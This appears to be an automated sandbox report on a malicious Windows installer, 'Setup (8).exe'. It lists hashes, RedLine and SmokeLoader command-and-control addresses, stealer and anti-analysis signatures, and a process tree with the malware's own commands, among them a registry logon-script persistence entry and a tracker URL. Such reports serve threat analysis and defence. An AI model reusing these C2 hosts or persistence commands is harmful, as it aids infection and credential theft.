Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
180s -
max time network
1811s -
platform
windows11_x64 -
resource
win11 -
submitted
22-08-2021 21:19
General
-
Target
Setup (8).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
v1
C2
195.2.78.163:25450
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
redline
Botnet
22.08
C2
95.181.172.100:55640
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 11 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 18 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 29 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 11 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 9 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 38 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 36 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 4 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\oisrIW8cl9kPJfPayawctCuj.exe"C:\Users\Admin\Documents\oisrIW8cl9kPJfPayawctCuj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1383812.exe"C:\Users\Admin\AppData\Roaming\1383812.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4512 -s 23244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3907346.exe"C:\Users\Admin\AppData\Roaming\3907346.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8095701.exe"C:\Users\Admin\AppData\Roaming\8095701.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\3751357.exe"C:\Users\Admin\AppData\Roaming\3751357.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 24284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\35NWwrPvSIJeGZ5xL1VAAHXm.exe"C:\Users\Admin\Documents\35NWwrPvSIJeGZ5xL1VAAHXm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 3123⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\dytdxt_zR0PMrPel4cDcaDxg.exe"C:\Users\Admin\Documents\dytdxt_zR0PMrPel4cDcaDxg.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\n_l41k4Oq4378esvJ6NRw0XH.exe"C:\Users\Admin\Documents\n_l41k4Oq4378esvJ6NRw0XH.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\n_l41k4Oq4378esvJ6NRw0XH.exeC:\Users\Admin\Documents\n_l41k4Oq4378esvJ6NRw0XH.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\uEV3Vf5YXi2L9WjEDEkGDlB_.exe"C:\Users\Admin\Documents\uEV3Vf5YXi2L9WjEDEkGDlB_.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 2883⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\LBObCNmipRlajJHar_xhU69X.exe"C:\Users\Admin\Documents\LBObCNmipRlajJHar_xhU69X.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\LBObCNmipRlajJHar_xhU69X.exe"C:\Users\Admin\Documents\LBObCNmipRlajJHar_xhU69X.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\eDa3n3VQ2job5rhMyqsTl6CQ.exe"C:\Users\Admin\Documents\eDa3n3VQ2job5rhMyqsTl6CQ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\DjhucvZBfe9UrfRO9P38zFVo.exe"C:\Users\Admin\Documents\DjhucvZBfe9UrfRO9P38zFVo.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\DjhucvZBfe9UrfRO9P38zFVo.exe"C:\Users\Admin\Documents\DjhucvZBfe9UrfRO9P38zFVo.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\PDFXZTFqVISUobbtJKHhyXv5.exe"C:\Users\Admin\Documents\PDFXZTFqVISUobbtJKHhyXv5.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 3123⤵
- Program crash
-
C:\Users\Admin\Documents\EmUwBnfD2qgOk7d6rohZHVfJ.exe"C:\Users\Admin\Documents\EmUwBnfD2qgOk7d6rohZHVfJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\EmUwBnfD2qgOk7d6rohZHVfJ.exeC:\Users\Admin\Documents\EmUwBnfD2qgOk7d6rohZHVfJ.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\x5ATr_K3DQ4IF7LsCE1TtfJk.exe"C:\Users\Admin\Documents\x5ATr_K3DQ4IF7LsCE1TtfJk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\jjSWYTUyf1nX_MlcOluMy6SV.exe"C:\Users\Admin\Documents\jjSWYTUyf1nX_MlcOluMy6SV.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\DU2meJRnT8mFqXy8yDXh1w6L.exe"C:\Users\Admin\Documents\DU2meJRnT8mFqXy8yDXh1w6L.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 2563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\jaMwcWj2lIGNxsLh_K47axDd.exe"C:\Users\Admin\Documents\jaMwcWj2lIGNxsLh_K47axDd.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\jaMwcWj2lIGNxsLh_K47axDd.exe"C:\Users\Admin\Documents\jaMwcWj2lIGNxsLh_K47axDd.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\KaE543Z29zbaghOstnb0rcsI.exe"C:\Users\Admin\Documents\KaE543Z29zbaghOstnb0rcsI.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-PQTRG.tmp\KaE543Z29zbaghOstnb0rcsI.tmp"C:\Users\Admin\AppData\Local\Temp\is-PQTRG.tmp\KaE543Z29zbaghOstnb0rcsI.tmp" /SL5="$D01E6,138429,56832,C:\Users\Admin\Documents\KaE543Z29zbaghOstnb0rcsI.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-71KV4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-71KV4.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 2966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U1FET.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-U1FET.tmp\Inlog.tmp" /SL5="$402E8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-KJR4T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KJR4T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DBOL3.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-DBOL3.tmp\Setup.tmp" /SL5="$300C2,17352168,721408,C:\Users\Admin\AppData\Local\Temp\is-KJR4T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-BOI1A.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-BOI1A.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffde6f046f8,0x7ffde6f04708,0x7ffde6f0471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3984 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1268 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1264 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6632 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,12104275657414509650,10265805918883544421,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:111⤵
-
